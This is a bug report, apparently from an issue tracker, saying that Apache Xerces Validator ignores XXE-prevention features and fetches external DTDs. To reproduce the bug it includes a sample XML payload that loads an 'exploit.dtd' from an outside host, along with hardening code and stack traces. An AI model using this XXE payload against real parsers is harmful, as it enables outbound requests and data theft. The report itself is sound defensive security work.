Details
Type: Bug
Status: Open
Priority: Major
Resolution: Unresolved
Description
During the implementation of a Validator using Apache Xerces, the features that are supposed to prevent XML External Entity processing are not working when set. When parsing an XML file, I consistently get DNS callbacks when it attempts to load an external DTD referenced from a DOCTYPE declaration. I am using the latest Xerces version (2.12.2).
Attempt 1
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema(schemaSources);
Validator validator = schema.newValidator();
validator.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
validator.setFeature("http://xml.org/sax/features/external-general-entities", false);
validator.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
validator.validate(new StreamSource(new ByteArrayInputStream(<xml file in byte Array form that contains DOCTYPE>)));
sample XML file
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd"> %xxe;]>
<!-- rest of XML file -->
When using a Validator, it doesn't throw a fatal-error exception when a document containing a DOCTYPE declaration is parsed. Here is an example of an outbound call made when an XML file containing a DOCTYPE declaration is parsed through the validator.
Caused by: java.io.IOException: Server returned HTTP response code: 403 for URL: https://ac961f4f1e4dadda80640ad3018a0016.web-security-academy.net/exploit.dtd
    at sun.net.www.protocol.http.HttpURLConnection.getInputStream0(HttpURLConnection.java:1914)
    at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1512)
    at sun.net.www.protocol.https.HttpsURLConnectionImpl.getInputStream(HttpsURLConnectionImpl.java:268)
    at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity(Unknown Source)
    at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
    at org.apache.xerces.impl.XMLEntityManager.startEntity(Unknown Source)
    at org.apache.xerces.impl.XMLDTDScannerImpl.startPE(Unknown Source)
    at org.apache.xerces.impl.XMLDTDScannerImpl.skipSeparator(Unknown Source)
    at org.apache.xerces.impl.XMLDTDScannerImpl.scanDecls(Unknown Source)
    at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset(Unknown Source)
    at org.apache.xerces.impl.XMLDocumentScannerImpl$DTDDispatcher.dispatch(Unknown Source)
    at org.apache.xerces.impl.XMLDocumentFragmentScannerImpl.scanDocument(Unknown Source)
    at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
    at org.apache.xerces.parsers.XML11Configuration.parse(Unknown Source)
    at org.apache.xerces.jaxp.validation.StreamValidatorHelper.validate(Unknown Source)
    at org.apache.xerces.jaxp.validation.ValidatorImpl.validate(Unknown Source)
    at javax.xml.validation.Validator.validate(Validator.java:124)
Instead of an outbound call, it should throw an exception for the DOCTYPE declaration in the XML file.
Attempt 2
SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema();
Validator validator = schema.newValidator();
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
validator.validate(new StreamSource(new ByteArrayInputStream(<byte Array>)));
This implementation is the recommended way to prevent external entity processing for validators (https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html#validator), but it gives the following error when used with Xerces.
org.xml.sax.SAXNotRecognizedException: Property 'http://javax.xml.XMLConstants/property/accessExternalDTD' is not recognized.
    at org.apache.xerces.jaxp.validation.ValidatorImpl.setProperty(Unknown Source)